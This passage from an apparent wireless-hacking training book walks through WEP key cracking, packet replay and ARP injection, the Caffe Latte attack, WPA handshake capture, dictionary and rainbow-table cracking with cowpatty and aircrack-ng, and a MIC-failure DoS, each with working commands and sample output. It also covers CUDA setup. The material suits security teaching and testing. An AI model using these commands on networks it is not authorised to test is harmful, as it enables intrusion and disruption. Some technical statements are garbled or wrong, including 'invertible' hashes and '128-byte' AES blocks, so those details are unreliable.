0 0/ 1 01( 43) 19( 15) 6E( 15) 10( 13) 5F( 13) 0E( 12) 5E( 12) 8C( 12) 60( 5) DD( 5) 2B( 3) 2D( 3)
1 0/ 1 23( 196) FA( 39) D8( 33) 64( 31) 2A( 22) 70( 18) 29( 16) 63( 16) 73( 16) 81( 15) 83( 15) 28( 13)
2 0/ 1 45( 169) 0B( 27) 40( 20) 4B( 20) 30( 17) 20( 15) 42( 15) 10( 13) A0( 13) FE( 13) 01( 10) 02( 10)
3 0/ 1 67( 317) 78( 56) 06( 41) 79( 40) 98( 33) 14( 29) B8( 26) E6( 26) 0F( 24) EB( 24) 29( 23) 65( 23)
4 0/ 2 89( 164) 0B( 87) 30( 30) 79( 30) 3F( 25) 7D( 22) 58( 20) F4( 18) 46( 13) 8F( 13) 2A( 10) 4B( 10)
5 0/ 1 AB( 376) 79( 50) 7A( 44) 10( 35) E6( 32) 11( 29) 63( 24) 76( 23) AC( 23) AE( 23) B6( 21) 62( 19)
6 0/ 1 CD( 276) C6( 46) C5( 44) C2( 29) 64( 23) 03( 20) B9( 20) F8( 20) 40( 18) AD( 18) E5( 18) 8D( 15)
7 0/ 1 EF( 341) E3( 140) 23( 99) 3C( 64) 73( 54) 66( 48) 34( 47) 5B( 46) 2E( 45) 19( 44) 69( 44) 95( 42)
8 0/ 1 01( 285) 29( 90) F3( 87) EC( 54) 30( 38) 6B( 38) 6D( 38) 8B( 36) 63( 35) DC( 35) 12( 33) 41( 33)
9 1/ 2 35( 192) 02( 148) E6( 111) 7D( 99) DF( 88) E5( 82) CF( 78) 24( 75) 07( 67) DE( 64) 5A( 63) D4( 63)
10 1/ 1 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0) 09( 0) 0A( 0) 0B( 0) 0C( 0)
KEY FOUND! [ 01:23:45:67:89:AB:CD:EF:01:23:45:67:89 ]

Decrypted correctly: 100%
Displayed above are the cracking results. The KB column numbers

key bytes, depth specifies how broad your search is mathematically,
while the columns under byte (vote) show the votes each byte value
has accumulated. 5 KB spaces are fixed for 40-bit WEP, while
a 104-bit WEP password takes 13 key bytes. If you are wondering
why only 12 values (0 to 11) are included in the first line? The simple
reason is that it makes more sense computationally-wise for the last
byte to be determined on a brute force basis. Rather than recover key
bytes by assembling votes, it seems more efficient to simply test the
checksums of the 256 possibilities.
The depth field indicates the current key search, while the value
after the slash shows the number of alternative candidates. Next are
the votes associated with several most voted bytes. As expected, the
key byte values vary wildly. At the bottom is the cracked WEP key.
The output also states how likely this key is to be correct; however, it
is not a cast-iron estimate.
When PTW is selected, the program’s cracking process is identical

from a user’s perspective. The sole difference lies in removing the
attack switch as PTW is the default cracking method in aircrack-ng.
# airodump-ng -c 9 -wtest wlan1
Where:

are missed
-w test: the prefix of the file name to which packets are written
# aircrack-ng packets-01.cap
Where:
packets-01.cap: the name of the file containing encrypted

packets
Interactive packet replay

In this attack mode, an assailant is able inject a selected packet into
a wireless network an arbitrary number of times. The packet file will
be accepted into the network and replayed by the access point.
Lacking a packet identifier capability, WEP is susceptible to replay

attacks. An attacker might use this vulnerability to stimulate
network traffic in order to generate new initialization vectors. Note
that not every packet will generate a reply successfully, and therefore
not every sent packet will generate a new IV.
The parameters:

are missed
# aireplay-ng -2 -b 00:14:6C:7E:40:80 -t 1 -c FF:FF:FF:FF:FF:FF –h

00:0F:B5:88:AC:82 -p 0841 wlan1
The parameters:
-2: selects the interactive packet replay attack
-b 00:14:6C:7E:40:80: the BSSID, or the MAC address of the

access point
-t 1: sets packets going to the access point (the To Distribution

System flag set)
-h 00:0F:B5:88:AC:82: the address of the associated client

-c FF:FF:FF:FF:FF:FF: the destination MAC address

(the broadcast address)
-p 0841: sets the Frame Control Field to make it look like

the packet is sent from a wireless client
Your output should be similar to this output:
Read 10 packets...
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:40:F4:77:E5:C9
Source MAC = 00:0F:B5:34:30:30
0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 .“..\{06)...
Use this packet ? y
If you want to use this packet, type y and press Enter.

You should also start airodump-ng to capture replies.
Sent 2966 packets...
As time elapses, the sent packet count will be increasing. Remember

to start airodump-ng first to register the packets for reuse.
ARP request replay attack

The fundamental basis of all encrypted wireless network key
cracking is an analysis of captured packet files. Statistically,
the more packets you manage to accumulate, the likelier you
are to recover the key. Because of this prerequisite, packet rate
performance of a computer has a direct bearing on the time you
spent listening on a network. An assured solution to accelerate
cracking is to force network clients to send encrypted packets.
An attacker may trigger increased traffic by making a network
replay ARP requests (injecting them into the wireless network).
Two WEP vulnerabilities are vital for the success of this attack.
The first flaw is the lack of a packet counter, which renders the
security protocol helpless in the face of a replay attack. The other
flaw is the fixed length packets have at encryption. ARP request
packets have a characteristic size, and so you are almost guaranteed
all packets with this size are ARP requests. Listen on a network until
you capture an ARP packet and retransmit it over and over as much
as you want.
The parameters:

are missed
# aireplay-ng -3 -b 00:19:E0:A4:8D:6A -h BA:BA:BA:FE:FE:FE wlan1

The parameters:
-3: selects the ARP request replay
-b 00:19:E0:A4:8D:6A: the BSSID, or the MAC address of the

access point
-h BA:BA:BA:FE:FE:FE: the MAC address of the associated client
If successfully executed, the command shows the information

below:
17:37:11 Waiting for beacon frame (BSSID: 00:19:E0:A4:8D:6A) on channel 8

Saving ARP requests in replay_arp-0602-173711.cap
You should also start airodump-ng to capture replies.
Read 84 packets (got 3 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Only the read packets count (84 in the output) increments until
an ARP request is captured. After the program seizes an ARP
request (3 requests are seized in this particular output), it should
automatically start an injection of this packet. As it being replayed,
the sent packet number goes up and pps (packets per second) will
show different values. You can also tell the attack is successful when
the DATA counter in airodump-ng begins to rapidly increase.
Caffe Latte Attack 79
Caffe Latte Attack

In this attack, an attacker is able to crack a wireless key without
having to be in the range of the wireless access point.
A relatively newly developed technique, the Caffe Latte Attack uses

a non-associated client to execute a break-in. The attacker runs
a rogue access point to automatically send positive responses to
requests to join selected wireless networks (or all networks). After
a connection is set up, client station software typically sends an extra
ARP request (a gratuitous ARP message), a step which is not needed
under any standard specifications but which proves useful in many
network environments. The request contains a sender’s IP address,
a source and destination MAC address and the sender’s MAC in
the source physical address field. The default physical address is
the FF:FF:FF:FF:FF:FF broadcast address. The broadcast amounts
to saying out loud, “I’ve just logged out, so if any of you need my IP
or MAC address, help yourself.” The attacker captures the packet
(since it is an ARP packet, it has a fixed format) and manipulates the
destination address (which is sent in the clear) so that it indicates
the original packet’s sender. All that’s needed now is to change
the encrypted requester ID field to a random address, correct the
checksum (as you do in chopchop) and send it back. The result is
a fully valid ARP request a client station will reply to and encrypt
it with a new IV. Sending this manipulated packet over and over
(essentially in a flood) allows you to generate large amounts of
information encrypted with different IVs targeting just a remote
client. The last step that completes the work is cracking the key using
FMS/KoreK or PTW.
The attack is implemented in airbase-ng and aireplay-ng. The first

is a choice when an access point is out of reach and you must set up
your own rogue access point. The usage:
# airbase-ng -c 9 -e name -L -W1 wlan1
The parameters:
-c 9: sets the channel for the rogue AP
-e name: the ESSID of the network you want to spoof
-L: activates the Caffe Latte attack
-W 1: enables WEP on the rogue AP
The other utility can be used as an alternative for the two previously-
described ways of obtaining initialization vectors.
# aireplay-ng -6 -e name wlan1
The parameters:
-6: the Caffe Latte attack
-e name: the name of the network you want to access

5
Chapter 5
WPA attacks
Chapter outline:
1. Introduction
2. WPA
3. WPA2
4. Rainbow tables
5. Brute force attack on WPA-PSK networks
6. DoS: Taking advantage of the MIC failure holdoff time
Introduction
With WEP deprecated as insecure, works began on a new standard
to replace it. 802.11i was developed in response, although it soon
became clear that the algorithms used in this WEP successor are
much more computationally intensive and could not be supported
on legacy hardware. As an interim solution, a slightly weaker
82 Chapter 5 – WPA attacks
equivalent of the standard was created simultaneously with the full

802.11i adaptation to remedy the known WEP vulnerabilities but
require less computing power. This in a nutshell is the background
behind the origins of WPA and WPA2. The former functions as
a WEP patch of sorts, and can be introduced through a simple
firmware upgrade.
WPA 83
WPA
WPA introduces a complicated hierarchical key structure. The most
important of the keys is the PMK (Pairwise Master Key). It can be
calculated in two ways. If WPA-PSK (WPA Personal) is enabled, the
key is loaded from local resources: otherwise, an external server is
used for authentication.
Association
EAP ID response
EAP ID request
EAP ID response EAP authentication request
EAP authentication request EAP authentication response

EAP authentication response
EAP success
Figure 15: EAP authentication
Following a client association, an access point (an authenticator)

sends an authentication request to the client station (a supplicant).
Next, using one of the several methods broadcast by the AP
(for example, MD5 challenge, TLS, TTLS, or PEAP), the user is
identified and authenticated. During this process, the authenticator
communicates with a special authentication server via a different
protocol (for example, RADIUS), ideally over a separate wired
connection. The server hosts a database containing user IDs and
passwords and tells the AP if the user is authorized. This task
delegation results in an efficient, scalable network infrastructure. In
particular, the infrastructure is centralized, with passwords stored
on a single server handling multiple access points.
Out-of-band path EAP method path
Pre-shared key AAA key
PMK
PTK
EAPOL KCK EAPOL KEK Temporal key
Figure 16: Key hierarchy
The elaborate key hierarchy and the ways to derive the PMK were
mentioned above. The Pairwise Master Key is used to generate the
PTK (Pairwise Transient Key) and the GTK (Group Temporal Key).
Other than the PMK, which is passed to the PBKDF2 function (more
about it later), the following components are used to create the first
key (PTK): a fixed string, the access point and client MAC address,
as well as the nonces sent by client and access point, SNonce and
ANonce. The PTK is used to transmit messages between a client
and access point. The GTK meanwhile is used to encrypt broadcast
data traffic. Both keys are 512-bit in WPA, and if WPA2 is used, they
are 384-bit. The PTK and GTK are generated during the four-way
handshake, a type of negotiation whose name originates in the
exchange of four EAPOL-Key messages.
In the first message, an access point generates a nonce (ANonce) and

sends it in the clear to a supplicant. The supplicant in turn generates
WPA 85
a SNonce and constructs the PTK using the sent ANonce. The key
is broken into several smaller keys, each having a different purpose.
Among those keys is the KCK (Key Confirmation Key), which helps
in generating the MIC (Message Integrity Code) computed using the
Michael algorithm.
The supplicant now has all the information necessary to encrypt

a message—unlike the access point. Accordingly, the client sends
a non-encrypted message containing a SNonce it generated with
a MIC. Receiving the packet, the authenticator can now also
compute the PTK and use one of its components (the KCK) to
compute the checksum of the received message. Provided they
match, the PTK is identical, and this means the client possesses the
shared secret key PMK. In the third message, the PTK-encrypted
GMK (Group Master Key) is sent. It is a random, checksum-
protected value. After the client receives it, it checks the MIC.
If correct, this means the access point possesses the shared secret
key. The last message simply confirms the successful authentication
and informs that the use of negotiated keys is in effect.
The GTK is generated in a similar manner. It is derived from the

GMK, a key submitted at an earlier stage. The following are needed
to calculate the GTK: a fixed string, the BSSID value and the
random GNonce.
Let’s now look at the WPA encryption diagram (figure 17). Rather
than do a simple concatenation of an IV and key, three values are
mixed. The first of them is the temporal key (TK), a part of the PTK.
Mixed with it are the transmitter MAC address (to avoid collisions)
and the 48-bit IV functioning now as a sequence counter. Note that
packets with IV numbers that are equal to or smaller than the last
accepted IV number will be rejected, preventing replay attacks.
Temporal key MIC key

Transmitter address Transmitter address
IV sequence counter Destination address
Plaintext
Key
MIC
mixing
II
WEP
Encrypted text
Figure 17: WPA encryption diagram
The above-mentioned inputs are mixed and then passed to the RC4
algorithm, just like in WEP.
WPA also improves on the WEP message integrity check. As the

CRC was found deficient, it was replaced with a new (this time
cryptographic) MIC algorithm known as Michael. The Michael
MIC is calculated from the plaintext MSDU padded with source and
destination addresses and TMK1. The TMK (Temporary MIC Key)
is a part of the PTK used for data integrity check. The two subkeys in
it are TMK1 (used for transmission) and TMK2 (used for reception).
As you can see, since source and destination addresses are used to
generate a checksum, manipulating them will cause a checksum
error. Aware of the flaws of Michael (working on this algorithm,
WPA 87
its developers realized available system architectures would not

be able to support longer keys, so they opted for a shorter key and
a protection mechanism), they introduced a security measure
preventing MIC attacks. When two packets with an incorrect
MIC are sent within less than a minute, traffic is suspended for
60 seconds.
WPA2
The key negotiation phase in WPA2 is identical to the four-way
handshake employed in WPA except for PMK size, now 384 bits.
This update is a by-product of dropping TMK keys. They have been
deemed redundant due to the omission of Michael (the CCMP
protocol has a built-in MIC generation function). Although as you
can see encryption has become more complicated overall, it also
delivers stronger security. IVs reappear in WPA2, but the name has
been changed to PNs (packet numbers). Similar to WPA, PNs are
successively increased, or incrementing, by 1 until they overflow.
The PN code is stored in CCMP headers together with the key ID of
an encrypted MPDU. The packet number also constructs a Nonce,
which includes the said packet number, sender MAC address and
the priority field (no longer used now: set to zero). The temporal
key, derived using the same method as in WPA, is passed to the
CCMP encryption block alongside the Nonce field, plaintext data
and AAD. Additional Authentication Data is a field that contains
information pertaining to all MAC header fields that should not
change in transit. The information includes source and destination
address. These inputs are processed by the CCMP function, a stream
processing-optimized AES algorithm variant in the CCM mode.
The AES (Advanced Encryption Standard) is a block cipher, and so
you need to feed it data in portions exactly 128 bytes in size. With
the modification, this is not necessary. The CCM mode takes into
account both earlier block encryption outputs and the counter
function output. The latter result is concatenated with MAC and
CCMP headers and next sent.
WPA2 89
PN
Plaintext MPDU
Increment A2, priority DATA MAC header

PN
Construct Construct
NONCE AAD
Key
ID
Temporal key
Construct
CCMP CCMP encryption
header
Encrypted data, MIC
II
Encrypted MPDU
Figure 18: CCMP encryption diagram

Decryption is a similar process:

Encrypted MPDU
PN A2, priority MIC DATA MAC header
Construct Construct
NONCE AAD
Temporal key
CCMP decryption
Plaintext
II
PN
Replay
check
Plaintext MPDU
Figure 19: CCMP decryption diagram
WPA2 91
There is a replay check at the end of this process. If the PN of

a current packet is smaller or equal to the PN of the previous
decrypted packet, it is rejected.
All known WEP gaps have been dealt with on account of these
solutions. The only effective attack on WPA2 key today is the brute
force technique. A brute force attack might be launched offline
using a captured four-way handshake. To sniff this negotiation,
you might wait for a user to log on or launch a deauthentication
attack, same as in WEP. Brute force cracking itself is a time intensive
process unfortunately, which reflects on the cracking speed
(depending on hardware type, it averages about 100 passwords
per second). The only attack you can successfully run in these
circumstances is the dictionary attack. The low performance boils
down to the necessity of applying the PBKDF2 function to generate
the PTK. Repeating the HMAC SHA-1 hash function 4,096 times
makes it extremely time-consuming.
The hash function has the task of processing input (key and ESSID)
in such a way that its result cannot be determined in any way other
than executing it. Besides, it is, or at least is supposed to be invertible,
which means that no information about the input should be derived
from the output. But before we go on to learn more about hash
functions, first let’s see a simple implementation of a brute force
attack against WPA.
The syntax for the brute force attack implementation:
# airodump-ng -wwpa-psk -c 1 ath0
The parameters:
-w wpa-psk: the dump file name
-c 1: the channel to listen on

ath0: the wireless interface
# aircrack-ng -wdictionary -0 wpa-psk
The parameters:
-w dictionary: the dictionary file
-0 wpa-psk: the dump file name
The speed of this attack is very low, although can be boosted with
the use of ‘rainbow tables’. Rainbow tables is a misleading name in
this context, however. We are going to use a simple table containing
precomputed hashes (our PBKDF2 outputs) and the data used
to generate them (ESSID + password) as input in cowpatty and
aircrack-ng attacks.
Rainbow tables 93
Rainbow tables
High quality rainbow tables can considerably fast-track WPA
cracking. First, an explanation of hash functions (as used in WPA,
for example PBKDF2 or MD5) and how to defeat them. Hashing
transforms a string into a fixed-length value called a hash or
message digest. A 64-bit hash function outputs a 64-bit hash.
A peculiar property of these functions is that they are ‘suspected’ of
being one-way, which means that we still cannot engineer a reverse
function to derive the original text from a hash. On the other hand,
cracking options are not plenty for hash functions, with brute force,
collision and rainbow tables as your choices.
That said, the first of these methods is almost painfully slow. While
in theory you could prepare a table storing all hashes and their
plaintexts, let’s see how big the hash table for a 64-bit function would
need to be. There are 264 possible hashes, each 64 bits (8 bytes) in
size. Overall, it’s 264*23 B = 257 KB = 247 MB = 237 GB = 227 TB, or
roughly 134 million terabytes! A 1 TB hard drive costs about 100
dollars, so to store your table you would need to cough up more than
13 billion.
Collision techniques take advantage of the limited domain

of hashes. If hash functions convert any arbitrary string into
a hash, you should be able to find two messages that produce
identical hashes. Finding hash function collisions more efficiently
is a constant work in progress; this process is very computationally
intensive. To prevent hashes from colliding, consider a simple
solution: use two different hash functions. The probability
of discovering a password collision for a password in two algorithms
in real time is negligible.
The newest of the attack methods are rainbow tables that have
the advantage of saving storage space at the cost of using more
computational power. Employing some complicated mathematics,

rainbow tables include hash chains that represent many values
but only store the starting point and endpoint. Due to this, table
generation takes longer than ordinary, but used disk space is
smaller: the longer the chain, the less space will be needed. We’ll
demonstrate the use of rainbow tables for a 128-bit MD5 hash
function, a staple in message boards (for example, phpBB) or
Content Management Systems. MD5 is used to secure an encrypted
password in a database. A user submits a logon password in
clear text, the server calculates its hash and compares it against
a corresponding database-stored hash. A sample hash for the word
‘hacker’ is ‘c346fa9479ed453541f0a1e0a5e5055c’ . Hashes are used to
prevent an intruder from obtaining plaintext passwords in the case
of a database break-in. But are they really that secure? An aggressor
can use brute forcing to crack them, but rainbow tables are also an
option. Anyone can generate tables, for example with the use of
RainbowCrack (http://project-rainbowcrack.com/). For example,
a rainbow table of all possible passwords between 1 to 7 lowercase
alphanumeric characters, encrypted with MD5, takes up about
10 GB, and you need from 2 to 3 days to generate it on a midrange
computer (2x2GHz CPU). Once this is done, cracking a hash is
a matter of minutes. You’ll find a lot of readily available rainbow
tables computed for multiple hash algorithms on the Internet, often
a joint work of hundreds of people. Google ‘rainbow tables’ and see
the results. The biggest tables we have found could crack passwords
comprising 12 lowercase and uppercase alphanumeric characters
and took up 200 GB of space.
WPA-applicable rainbow tables tend to be more complicated than

those mentioned above. PBKDF2 hashes are derived not only
from the key but also from the network’s ESSID. As a result, the
precomputed rainbow tables on the Internet work for the most
Cowpatty attack 95
common ESSIDs used in the USA (1,000 values, for example) and
use a common password dictionary.
Cowpatty attack
This cowpatty dictionary attack tries to decrypt a captured four-way
handshake (stored in the test-01.cap file) using a precomputed hash
database (hackingschool).
An implementation of the attack:
# cowpatty -s “hackingschool” -r test-01.cap -d hackingschool
Where:
-s “hackingschool”: identifies the ESSID, or the ‘hackingschool’

network name
-r test-01.cap: the name of the four-way handshake capture file
-d hackingschool: the name of the hash file
Here’s a sample output:
cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: 04151978
key no. 2000: 10000thumbs
key no. 3000: 1129zach
(...)
key no. 1148012000: zhuxinye
key no. 1148013000: zinsspanne
key no. 1148014000: zomerjapon
The PSK is „zorro666”.
1148014761 passphrases tested in 10.81 seconds: 106194126.64 passphrases/second
Thanks to the hash file, cracking succeeds under 11 seconds.

Another attack to mount is the latest (still being developed as of
now) aircrack implementation:
# aircrack-ng -r testdb wpa2.cap
Where:
-r testdb: the precomputed hash database
wpa2.cap: the name of the four-way handshake capture file
Cracking an identical password using aircrack took about 20

seconds. Note that aircrack makes use of a different database
format, however, the suite includes a basic database converter. It is
available with this command:
# airolib-ng testdb --import cowpatty cowexportoftest
The parameters:
testdb: the target aircrack database name
--import cowpatty: imports cowpatty data
cowexportoftest: the source cowpatty file name
The response:
importReading header...
Reading...
Updating references...
Writing...
The command converts a cowpatty table in the cowexportoftest file

to a format accepted by aircrack-ng. The testdb file is the imported
database. Conversion speed depends on the original file size.
DoS: Taking advantage of the MIC failure holdoff time 97
DoS: Taking advantage of the MIC failure

holdoff time
Earlier in the book we talked about a security solution implemented
to prevent active attacks on APs. To recap, if more than one packet
with an incorrect MIC is received within a minute, the AP suspends
traffic on a network for 60 seconds. This feature can be exploited
also by an adversary to block a WLAN by merely sending 2 packets
per minute. As you’d imagine, the MIC failure holdoff time can be
used in DoS attacks, and it is relatively hard to disclose the source of
the attack even if specialist equipment is used.
6
Chapter 6
CUDA-powered attacks
Chapter outline:
1. What is CUDA?
2. Drivers and development environment configuration
3. CUDA in action: WLAN attacks
4. Appendix A: CUDA-powered cracking of MD4/MD5 hashes
5. Appendix B: Wardriving experiment
What is CUDA?
CUDA (the Compute Unified Device Architecture) is
a parallel computing platform developed by NVIDIA
and implemented in newer models of multi-core
NVIDIA GPUs. For a full list CUDA-enabled GPUs, see
http://en.wikipedia.org/wiki/CUDA#Supported _ GPUs
100 Chapter 6 – CUDA-powered attacks
GPGPU, a shorthand for General-Purpose computing on Graphics

Processing Units, can ratchet up computer performance as a GPU
in this solution processes more data simultaneously than a CPU.
Multi-core CUDA GPUs dramatically accelerate not only graphics,
but can also be used for number crunching. Late-model GPUs
are able to execute thousands of threads concurrently on multiple
cores, contributing to a significant rise in performance. The CUDA
technology finds a host of applications due to its speed, including
bioinformatics and cryptography. Later in the chapter we’ll present a
general outline of the CUDA processing.
CUDA application developers use a high-level programming model

based on the C programming language, specifically C for CUDA,
C with NVIDIA extensions. As a result, programmers do not need to
know OpenGL or how to talk with the cards. On a side note, CUDA
libraries for Java, Python, Fortran and MATLAB are also available.
Video cards: Not only for gaming?

Rather than play the latest video game with fancy-pants graphics,
you can harness the computational power of a cutting-edge GPU for
other purposes.
We’ll be using the CUDA technology to mount an attack on WPA.

Based on the tests and benchmarks published on the Internet, it
seems hardware-accelerated cracking is even 100 times faster with
CUDA-enabled applications. But that doesn’t quite exhaust the
possible applications of CUDA. The platform can speed up MD4/
MD5, SHA-1 or NTLM hash cracking; towards the end of this
chapter, you’ll find Appendix A (CUDA-powered cracking od
MD4/MD5 hashes) with a description of the MD5 GPU Crack and
CUDA-Multiforcer crackers. However, the focus of this guide are
WLANs and their security.
Drivers and development environment configuration 101
Drivers and development environment

configuration
NVIDIA drivers
To ensure every operation in this section executes properly, first
configure your platform to meet our requirements.
All essential drivers and tools can be downloaded from our site
and installed in the Training Operating System v2.0 using this
command:
[root@localhost root]# wget http://hackingschool.com/download/cuda-ext.tar.bz2
Please note that we prepared a special edition of Training

Operating System v2.0 CE (CudaEdition) which does not require
any additional configuration. All the tools presented in this
course are ready to use.
!
Note. If you are not running the Training Operating System v2.0
included, we cannot guarantee the tools are compatible with your
system. The package contains source code of all applications,
however note that compilation and setup details can vary slightly NOTE
from case to case.
When you download the cuda-ext.tar.bz2 archive, unpack it and

start installing the first components.
[root@localhost root]# tar xfj cuda-ext.tar.bz2
If you don’t plan to reuse the archived kit, delete it.
[root@localhost root]# rm –f cuda-ext.tar.bz2
Move to the unzipped directory.

[root@localhost root]# cd cuda-ext
The directory contains the executable ./runme, which will handle

some of the setup steps for you. Run it.
[root@localhost cuda-ext]# ./runme
Type Y (yes) in response to every question about installing a new

package.
[+] System update in progress...

rm: cannot remove `/var/lib/apt/lists/partial’: Is adirectory
Reading Package Lists... Done
Building Dependency Tree... Done
The following extra packages will be installed:
dkms-nvidia-current libice6-devel libmesagl1-devel libmesaglu1-devel
libsm6-devel libxdamage-devel libxfixes3-devel
libxmu6-devel libxt6-devel libxxf86vm-devel x11-driver-video-nvidia-current
The following packages will be upgraded
dkms-nvidia-current x11-driver-video-nvidia-current
The following packages will be REPLACED:
nvidia_177.xx (by nvidia_190.xx)
The following NEW packages will be installed:
libice6-devel libmesagl1-devel libmesaglu1-devel libmesaglut3-devel
libpython2.5-devel libsm6-devel libxdamage-devel
libxfixes3-devel libxmu6-devel libxt6-devel libxxf86vm-devel nvidia_190.xx
2 upgraded, 12 newly installed, 1 replaced, 0 removed and 809 not upgraded.
Need to get 0B/19,8MB of archives.
After unpacking 28,8MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Committing changes...
Preparing ############################## [100%]
Updating / installing
libxfixes3-devel-4.0.3-2pclos2007.i586 ############################## [100%]
libice6-devel-1.0.4-3pclos2007.i586 ############################## [100%]
libsm6-devel-1.0.3-2pclos2007.i586 ############################## [100%]
libxdamage-devel-1.1.1-2pclos2007.i586 ############################## [100%]
libxxf86vm-devel-1.0.1-4pclos2007.i586 ############################## [100%]
libmesagl1-devel-7.0.2-1pclos2007.i586 ############################## [100%]
libxt6-devel-1.0.5-2pclos2007.i586 ############################## [100%]
libxmu6-devel-1.0.4-1pclos2007.i586 ############################## [100%]
libmesaglu1-devel-7.0.2-1pclos2007.i58 ############################## [100%]
x11-driver-video-nvidia-current-190.42 ############################## [100%]

Cleaning up / removing
x11-driver-video-nvidia-current-177.82 ############################## [100%]
Updating / installing
libmesaglut3-devel-7.0.2-1pclos2007.i5 ############################## [100%]
libpython2.5-devel-2.5.2-1pclos2007.i5 ############################## [100%]
nvidia_190.xx-190.42-1pclos2010.i586 ############################## [100%]
dkms-nvidia-current-190.42-1pclos2010. ############################## [100%]
-------- Uninstall Beginning --------

Module: nvidia-current
Version: 177.82-1pclos2007
Kernel: 2.6.26.8.tex3 (i586)
-------------------------------------
Status: Before uninstall, this module version was ACTIVE on this kernel.
nvidia-current.ko.gz:
- Uninstallation
- Deleting from: /lib/modules/2.6.26.8.tex3/kernel/drivers/char/drm/
- Original module
- No original module was found for this module on this kernel.
- Use the dkms install command to reinstall any previous module version.
DKMS: uninstall Completed.
------------------------------
Deleting module version: 177.82-1pclos2007
completely from the DKMS tree.
------------------------------
Done.
Stopping atd: [ OK ]
Starting atd: [ OK ]
Cleaning up / removing
dkms-nvidia-current-177.82-1pclos2007. ############################## [100%]
nvidia_177.xx-177.82-1pclos2007.i586 ############################## [100%]
Using `/etc/nvidia-current/ld.so.conf’ to provide `gl_conf’.
Creating symlink /var/lib/dkms/nvidia-current/190.42-1pclos2010/source ->

/usr/src/nvidia-current-190.42-1pclos2010
DKMS: add Completed.
Running PCLinuxOS DKMS build routine. Please Wait....
Building module:
cleaning build area....

make KERNELRELEASE=2.6.26.8.tex3 SYSSRC=/lib/modules/2.6.26.8.tex3/
build module..........
cleaning build area....
DKMS: build Completed.

Running module version sanity check.
nvidia-current.ko.gz:
- Original module
- No original module exists within this kernel
- Installation
- Installing to /lib/modules/2.6.26.8.tex3/kernel/drivers/char/drm/
depmod.......
DKMS: install Completed.

Stopping atd: [ OK ]
Starting atd: [ OK ]
Done.
[+] Done. Now you can compile the stuff.
The X server needs to restart to finalize the driver installation.

When the system prompts a restart request, click OK or restart X
manually later.
CUDA GPU drivers have been installed successfully. Let’s move to

the next stage.
Installing CUDA-Toolkit and SDK

To install CUDA-Toolkit and SDK, use the scripts included in our
kit’s unpacked directory, cuda-ext:
[root@localhost cuda-ext]# ./cudatoolkit_2.3_linux_32_ubuntu9.04.run
Installing can take some time.
When the install process is completed, install SDK.
[root@localhost cuda-ext]# ./cudasdk_2.3_linux.run
SDK configuration should end with an excerpt similar to this one:
========================================
Configuring SDK Makefile (/root/NVIDIA_GPU_Computing_SDK/shared/common.mk)...
========================================
* Please make sure your PATH includes /usr/local/cuda/bin

* Please make sure your LD_LIBRARY_PATH includes /usr/local/cuda/lib
* To uninstall the NVIDIA GPU Computing SDK, please delete /root/

NVIDIA_GPU_Computing_SDK
* Installation Complete
In the next step, move to the SDK directory and compile the sources.
[root@localhost cuda-ext]# cd ~/NVIDIA_GPU_Computing_SDK/C

[root@localhost cuda-ext]# make
[root@localhost cuda-ext]# ldconfig
The platform has been installed. Let’s see if it runs properly by using
the SDK sample codes.
[root@localhost C]# cd bin/linux/release/
[root@localhost release]# ./deviceQuery -noprompt

CUDA Device Query (Runtime API) version (CUDART static linking)

There is 1 device supporting CUDA
Device 0: „GeForce 9600M GT”

CUDA Driver Version: 2.30
CUDA Runtime Version: 2.30
CUDA Capability Major revision number: 1
CUDA Capability Minor revision number: 1
Total amount of global memory: 536543232 bytes
Number of multiprocessors: 4
Number of cores: 32
Total amount of constant memory: 65536 bytes
Total amount of shared memory per block: 16384 bytes
Total number of registers available per block: 8192
Warp size: 32
Maximum number of threads per block: 512
Maximum sizes of each dimension of ablock: 512 x 512 x 64
Maximum sizes of each dimension of agrid: 65535 x 65535 x 1
Maximum memory pitch: 262144 bytes
Texture alignment: 256 bytes
Clock rate: 1.25 GHz
Concurrent copy and execution: Yes
Run time limit on kernels: Yes
Integrated: No
Support host page-locked memory mapping: No
Compute mode: Default (multiple host threads
can use this device
simultaneously)
Test PASSED
As you can see in the listing above, the device and CUDA drivers
have been detected. SDK and CUDA-Toolkit are running and ready
to use when needed.
While CUDA programming is not the matter at hand in this book,

you can find more information in a guide offered on the NVIDIA
website:
http://docs.nvidia.com/cuda/index.html
Cowpatty
Cowpatty is a dictionary cracker that can be used to defeat a wireless
key. It makes use of a submitted passphrase and ESSID list or
a precomputed hash table.
Installation
Navigate again to the cuda-ext directory:
[root@localhost root]# cd ~/cuda-ext/
Unpack the cowpatty archive:
[root@localhost cuda-ext]# tar xfz cowpatty-4.6.tgz
Move to the unpacked directory and compile it:
[root@localhost cuda-ext]# cd cowpatty-4.6

[root@localhost cowpatty-4.6]# make
cc -pipe -Wall -DOPENSSL -O2 -g3

-ggdb -c -omd5.omd5.c
-ggdb -c -osha1.osha1.c
-ggdb -c -outils.outils.c
-ggdb -c -ocowpatty.ocowpatty.c
-ggdb -c -ogenpmk.ogenpmk.c
-ggdb cowpatty.c -ocowpatty
utils.omd5.osha1.o-lpcap -lcrypto
cc -pipe -Wall -DOPENSSL -O2 -g3 -ggdb genpmk.c -ogenpmk utils.osha1.o
-lpcap -lcrypto
Next, run this command:
[root@localhost cowpatty-4.6]# make install

Useful options and commands

Usage: cowpatty [options]
-f: dictionary file
-d: hash table file
-r: packet capture file
-s: network ESSID
-c: checks four-way handshake
-h: print help
-v: prints verbose information
-V: program version
Pyrit
Installation
